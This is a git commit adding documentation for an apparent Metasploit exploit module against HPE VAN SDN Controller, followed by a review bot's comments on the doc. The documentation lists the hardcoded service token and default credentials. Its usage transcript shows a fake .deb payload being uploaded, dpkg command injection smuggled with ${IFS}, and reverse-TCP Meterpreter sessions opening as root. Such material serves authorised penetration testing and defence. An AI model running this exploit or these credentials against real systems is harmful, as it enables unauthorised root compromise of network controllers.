Add module doc
parent
41b0adad88
commit
12a0aaeaf1
|
@ -0,0 +1,85 @@
|
|||
## Intro
|
||||
|
||||
This module exploits a hardcoded service token or default credentials in
|
||||
HPE VAN SDN Controller <= 2.7.18.0503 to execute a payload as root.
|
||||
|
||||
A root command injection was discovered in the uninstall action's name
|
||||
parameter, obviating the need to use sudo for privilege escalation.
|
||||
|
||||
If the service token option `TOKEN` is blank, `USERNAME` and `PASSWORD`
|
||||
will be used for authentication. An additional login request will be
|
||||
sent.
|
||||
|
||||
## Setup
|
||||
|
||||
Follow <http://h22208.www2.hpe.com/eginfolib/networking/docs/sdn/sdnc2_6/5998-8473install/content/s_download_sw.html>.
|
||||
|
||||
Tested on 2.7.18.0503.
|
||||
|
||||
## Options
|
||||
|
||||
**TOKEN**
|
||||
|
||||
Set this to the service token. Defaults to `AuroraSdnToken37`.
|
||||
|
||||
**USERNAME**
|
||||
|
||||
Set this to the service username. Defaults to `sdn`.
|
||||
|
||||
**PASSWORD**
|
||||
|
||||
Set this to the service password. Defaults to `skyline`.
|
||||
|
||||
## Usage
|
||||
|
||||
```
|
||||
msf5 > use exploit/linux/http/hp_van_sdn_token
|
||||
msf5 exploit(linux/http/hp_van_sdn_token) > set rhosts 192.168.56.102
|
||||
rhosts => 192.168.56.102
|
||||
msf5 exploit(linux/http/hp_van_sdn_token) > set target Linux Dropper
|
||||
target => Linux Dropper
|
||||
msf5 exploit(linux/http/hp_van_sdn_token) > set payload linux/x64/meterpreter/reverse_tcp
|
||||
payload => linux/x64/meterpreter/reverse_tcp
|
||||
msf5 exploit(linux/http/hp_van_sdn_token) > set lhost 192.168.56.1
|
||||
lhost => 192.168.56.1
|
||||
msf5 exploit(linux/http/hp_van_sdn_token) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.56.1:4444
|
||||
[*] Authenticating with service token AuroraSdnToken37
|
||||
[*] Uploading payload as fake .deb
|
||||
[+] Uploaded /var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1.deb
|
||||
[*] Renaming payload and executing it
|
||||
[*] Injecting dpkg -r --pre-invoke=mv${IFS}/var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1.deb${IFS}/var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1${IFS}&&${IFS}chmod${IFS}+x${IFS}/var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1
|
||||
[*] Injecting dpkg -r --pre-invoke=/var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1
|
||||
[*] Sending stage (812100 bytes) to 192.168.56.102
|
||||
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.102:34468) at 2018-07-03 18:23:08 -0500
|
||||
[+] Deleted /var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: uid=0, gid=0, euid=0, egid=0
|
||||
meterpreter > sysinfo
|
||||
Computer : 192.168.56.102
|
||||
OS : Debian 8 (Linux 4.4.0-2-amd64-hlinux)
|
||||
Architecture : x64
|
||||
BuildTuple : x86_64-linux-musl
|
||||
Meterpreter : x64/linux
|
||||
meterpreter >
|
||||
Background session 1? [y/N]
|
||||
msf5 exploit(linux/http/hp_van_sdn_token) > set token ""
|
||||
token =>
|
||||
msf5 exploit(linux/http/hp_van_sdn_token) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.56.1:4444
|
||||
[*] Authenticating with creds sdn:skyline
|
||||
[+] Logged in with auth token 26d7b53a73a9455eae63c346321bfe31
|
||||
[*] Uploading payload as fake .deb
|
||||
[+] Uploaded /var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l.deb
|
||||
[*] Renaming payload and executing it
|
||||
[*] Injecting dpkg -r --pre-invoke=mv${IFS}/var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l.deb${IFS}/var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l${IFS}&&${IFS}chmod${IFS}+x${IFS}/var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l
|
||||
[*] Injecting dpkg -r --pre-invoke=/var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l
|
||||
[*] Sending stage (812100 bytes) to 192.168.56.102
|
||||
[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.102:34474) at 2018-07-03 18:24:47 -0500
|
||||
[+] Deleted /var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l
|
||||
|
||||
meterpreter >
|
||||
```
|
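Review bot: The Usage transcript runs `set target Linux Dropper`, but the Options section documents only `TOKEN`, `USERNAME` and `PASSWORD`, so the available targets and how they differ are never described; add a short Targets section. In Setup, the link is plain `http` and points at the 2.6 install guide (`sdnc2_6`) while the doc says "Tested on 2.7.18.0503"; state whether the 2.6 procedure applies unchanged to 2.7. The Intro mentions only the uninstall action's name parameter, yet the transcript shows an upload to `/var/lib/sdn/uploads/` and a rename before execution; one sentence on that sequence, and on the file being deleted afterwards, would tell responders which artifacts to look for.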